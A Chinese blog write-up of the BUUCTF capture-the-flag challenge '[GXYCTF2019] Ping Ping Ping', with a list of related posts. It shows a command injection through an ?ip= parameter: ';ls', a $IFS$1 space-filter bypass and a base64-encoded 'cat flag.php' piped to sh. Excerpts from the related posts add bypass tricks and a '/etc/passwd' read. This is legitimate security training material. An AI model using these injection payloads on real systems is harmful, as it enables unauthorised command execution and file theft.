ctf题集【BUUCTF WEB】[GXYCTF2019]Ping Ping Ping 1

最新推荐文章于 2024-07-25 14:14:33 发布

唉哟喂New

最新推荐文章于 2024-07-25 14:14:33 发布

阅读量523

点赞数 7

分类专栏： CTF WEB 文章标签：网络安全 web安全

本文链接：https://blog.csdn.net/qq_42667028/article/details/135081341

版权

CTF WEB 专栏收录该内容

9 篇文章 0 订阅

订阅专栏

打开网站，发现提示/?ip=

那么尝试输入/?ip=127.0.0.1后成功执行

尝试能否用管道符执行，输入参数/?ip=127.0.0.1;ls

发现flag.php在当前目录下，那么就需要查看这个文件，尝试输入/?ip=127.0.0.1;cat flag.php

说明空格被限制了，多次尝试发现$IFS$1可以绕过，尝试输入/?ip=127.0.0.1;cat$IFS$1flag.php

flag也被限制了，那么尝试/?ip=127.0.0.1;cat$IFS$1fla*

看来*也被限制了，那么尝试'''、''、\、$1、都无法绕过，换个思路，用base64绕过

echo "Y2F0IGZsYWcucGhwCg==" | base64 -d | sh
echo$IFS$1Y2F0IGZsYWcucGhwCg==$IFS$1|$IFS$1base64$IFS$1-d|sh

成功绕过

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

唉哟喂New

关注关注

7
点赞
踩
9

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

buuctf[GXYCTF2019]Ping Ping Ping

hintll的博客

03-21

5219

buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目打开环境后只有一个/ip=？应该是提示用get的方式来传参一个地址执行ping的操作直接ping127.0.0.1 回显ping127.0.0.1的数据说明是一道命令执行的题目执行：?ip=127.0.0.1|ls 其中|的作用是命令分隔符还有相关的符号 ; --在 shell 中，是”连续指令” & --不管第一条命令成功与否，都会执行第二条命令 &

BUUCTF__[GXYCTF2019]Ping Ping Ping_题解

风过江南乱的博客

06-25

3177

前言我感觉我是一个假的理科生，假的计算机相关专业学生，完全没有该有的样子这题有点东西，不算太水。只是对我来说。读题题目是Ping，打开也没有内容，就一个get传参的ip变量不过看到ip和ping就容易联想到，终端ping命令。先尝试传入一个ip=127.0.0.1，于是乎出现了如下，在终端下执行的效果就是这样，命令执行石锤了。命令执行可以干很多事，也就是命令行，LInux下大佬们日常操作都用命令行代替鼠标。首先想到用什么办法？让它执行我们需要的命令。很明显变量ip是突破点。先看传

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF-Web:[GXYCTF2019]Ping Ping Ping

m0_56161093的博客

04-26

2149

题目解题过程 1、题目页面提示?ip=,猜测是让我们把这个当做变量上传参数，由此猜想是命令注入 2、用管道符加上linux常用命令ls(windwos可以尝试dir)试试所谓管道符(linux)的解释与用法如下：尝试命令： ?ip=127.0.0.1;ls 看到flag.php,那就使用cat flag.php命令尝试读取 ?ip=127.0.0.1;cat flag.php 被过滤了空格，过滤空格的方法如下： $IFS ${IFS} $IFS$1 //$1改成$加其他数字貌似都行 &l

BUUCTF [GXYCTF2019]Ping Ping Ping 1

m0_62879498的博客

03-11

5947

[GXYCTF2019]Ping Ping Ping 1 在本题我们考察的是命令执行已进入本关，我们发现他在询问 ?ip 我们先尝试输入 ?ip=127.0.0.1 发现访问成功查询一下它的目录： ?ip=127.0.0.1|ls 发现有两个文件夹flag.php，index.php，发现 flag 我们尝试访问 flag。 ?ip=127.0.0.1|cat flag.php 点击查询，很明显我们需要进行一个空格的过滤空格过滤常见绕过注释： < > %20(spac

CTF-Web习题：[GXYCTF2019]Ping Ping Ping

最新发布

LJW123487的博客

07-25

697

本题涉及知识点：命令执行漏洞，过滤绕过

BUUCTF—[GXYCTF2019]Ping Ping Ping1

qq_57778984的博客

10-22

384

内联绕过就是将反引号内命令的输出结果作为另一个命令的输入来执行，比如系统对flag字符进行了过滤，但是单独使用ls命令时又会回显出index.php和flag.php文件，那么我们可以通过ls命令将index.php和flag.php作为输入，通过cat查看两个文件获取flag，而不用输入cat flag.php触发关键词。3.尝试在执行ping命令后执行其他命令，用";连接两个命令时，第二个命令只有在第一个命令执行成功的情况下才会执行。连接两个命令时，第二个命令只有在第一个命令执行失败的情况下才会执行。

BUUCTF--web--[GXYCTF2019]Ping Ping Ping--过滤操作

llx101388627的博客

05-02

390

点开链接，可以看到网页上仅有一行字：不过可以从形式上看出，是告诉我们有一个变量ip 所以进行赋值尝试：可以猜到程序极有可能是把我们上传的值作为一个ip地址，进行ping 命令尝试在赋值语句后添加新的语句来查看目录：发现可以，同时知道了有两个文件：index.php和flag.php 容易猜到flag 应该在flag.php中，那么尝试用cat命令查看：看来程序中有过滤操作，这里应该是提示把空格过滤了，但过滤肯定不止空格所以先想办法看一下index.php的源码空格过滤处理 1、${I

BUUCTF[GXYCTF2019]Ping Ping Ping 1

徐海洋

02-01

392

[GXYCTF2019]Ping Ping Ping 1

BUUCTF-[GXYCTF2019]Ping Ping Ping1

Monica的博客

09-13

627

目录题目：分析：方法：方法1: 方法2: 方法3: 题目：提示get传入一个ip的值，猜测是exec函数执行一个外部程序。分析：使用；同时执行前面和后面的命令相关知识点 payload:?ip=127.0.0.1;ls 发现flag payload:?ip=127.0.0.1;tac flag.php 通过测试发现，过滤了空格、<、>、{、}、flag、*、?、'、"、)、[、]、/等在linux 空格可以用以下字符串...

buuctf [GXYCTF2019]Ping Ping Ping!

hintll的博客

06-10

1060

[GXYCTF2019]Ping Ping Ping! 这个题目的标题是ping ping ping 打开以后是这样的先是看到这个提示，看到？第一想到的就是get，那么就先get一个ip上去然后有一行回显应该是命令执行漏洞命令执行就用命令拼接符执行漏洞命令就行命令拼接符： |、||、&、&&的区别： &：无论左边是false还是true，右边都执行 &&：具有短路效果，左边是false，右边不执行。 |:无论左边是false还是true，右边都会执

BUU CTF [GXYCTF2019]Ping Ping Ping 1

qiaopeifan的博客

01-26

489

BUU CTF [GXYCTF2019]Ping Ping Ping 1打开题目，页面显示/?ip= 应该是一个传参的提示。结合题目的ping。尝试?ip=1 1.看到ip很明显传一个Ip看看作为菜鸟，我根据自己的判断认为通过Ip传输方式认为是linux所以我们可以在这里输入linux命令常用的就是ls 2.我们看到两个文件，完了进行访问，但是发现flag.php访问不了,大概是说有空格，判断目标网站是对空格进行了过滤，我们可以使用一些方法代替空格来起到分割作用注：%20(space)、%09(t

[GXYCTF2019]Ping Ping Ping (命令执行)

一期一会的博客

12-27

731

命令执行过滤空格 %20(space)、%09(tab)、$IFS$9、 IFS、IFS 使用<或者<>来绕过空格 cat<a.txt 花括号扩展{OS_COMMAND,ARGUMENT} {cat,/etc/passwd} IFS空格绕过catIFS 空格绕过 catIFS空格绕过catIFSa.txt 变量控制 X=$'cat\x09./flag.php 关键字过滤使用空变量使用∗和*和∗和@，x(x代表1−9),x(x 代表 1-9),x(x代表1−9),{x}(x&gt

BUUCTF刷题之路-web-[GXYCTF2019]Ping Ping Ping1

qq_30528603的博客

11-26

394

最近才学习的nc反弹shell。想着是否能用nc反弹shell的办法。我在网上看到别的师傅有用base64编码绕过的。有兴趣的可以研究下。这个构造的意思是，我们创建2变量，并采用传参的方式来绕过直接写flag。发现没有回显，证明这个方法是不可用的。文件的输出让我们看到这是过滤规则。看来我们的猜测是正确的。因此我们要想另外的办法绕过flag这个字符。看样子是能够触发远程执行漏洞的。尝试下ping 127.0.0.1，如果有回显说明我们的想法是对的。回显告诉我们，可能flag这几个字符也被过滤了。

BUUCTF之Ping Ping Ping

金帛的博客

02-20

7047

BUUCTFWP，关于一些waf的绕过

[BUUCTF]-Web:[GXYCTF2019]Ping Ping Ping解析(贪婪匹配，空格过滤）

2301_79326813的博客

01-31

1373

先看网页按照正常流程，先ip+ls，可以看到flag但是不能直接得flag，他应该是过滤掉了一点东西。这里考虑过滤掉了空格。

命令执行绕过 [GXYCTF2019]Ping Ping Ping1

m0_75178803的博客

10-10

875

在去年参加的第四届强网杯全国网络安全竞赛中，就遇到过命令执行漏洞绕过的题目 CTF解题-2020年强网杯参赛WriteUp（题目名称 “主动” ），当时采用了 base64 编码联合反引号、变量拼接两种方式绕过了 flag 关键字的过滤并读取了 flag 值：本文目的在于结合 BU_绕过空格过滤。所以cat$IFS$1`ls`也相当于cat falg.php;`` 反引号 cat$IFS$1`ls`cat $a$b.php。通过变量赋值，再进行拼接，即可进行绕过。

CTF演练---ping

2301_78637299的博客

06-06

649

CTF演练---ping--->只需要输入ip，就可以获取到你想要的

CTF_Web_[GXYCTF2019]Ping Ping Ping

十二_的博客

07-26

1832

表示上一条命令执行失败后，才执行下一条命令，如catnofile||echo“fail”表示前一条命令执行成功时，才执行后一条命令，如echo'1‘&&echo‘2’表示管道，上一条命令的输出，作为下一条命令参数，如echo‘yes’|wc-l。发现没有任何新的回显，应该是因为前面是假ping，所以后面的命令不执行。如上图，“||”会有效果—显示了两个后缀为“php”的文件名.文件，或许我们要找的flag就在其中。根据大佬解题的思路，我们来找文件，进行测试。...

BUUCTF_Web_[GXYCTF2019]Ping Ping Ping

阿刁〇的博客

08-01

308

BUUCTF_Web_[GXYCTF2019]Ping Ping Ping 首先打开靶机根据提示构造参数：http://8c638bd1-504a-40d4-81db-4ac92a9464f3.node4.buuoj.cn/?ip=127.0.0.1 尝试拼接命令读取flag：http://8c638bd1-504a-40d4-81db-4ac92a9464f3.node4.buuoj.cn/?ip=127.0.0.1;cat%20/flag 发现被过滤了，进行其他尝试 http://8c638b

GXYCTF 2019：利用.htaccess文件上传WebShell

"CTF-WEB[GXYCTF 2019]BabyUpload" 这篇内容涉及的是一个CTF（Capture The Flag）比赛中的Web安全挑战，具体是GXYCTF 2019赛事的一个题目，名为"BabyUpload"。这个挑战主要围绕着网站文件上传漏洞进行，参赛者需要...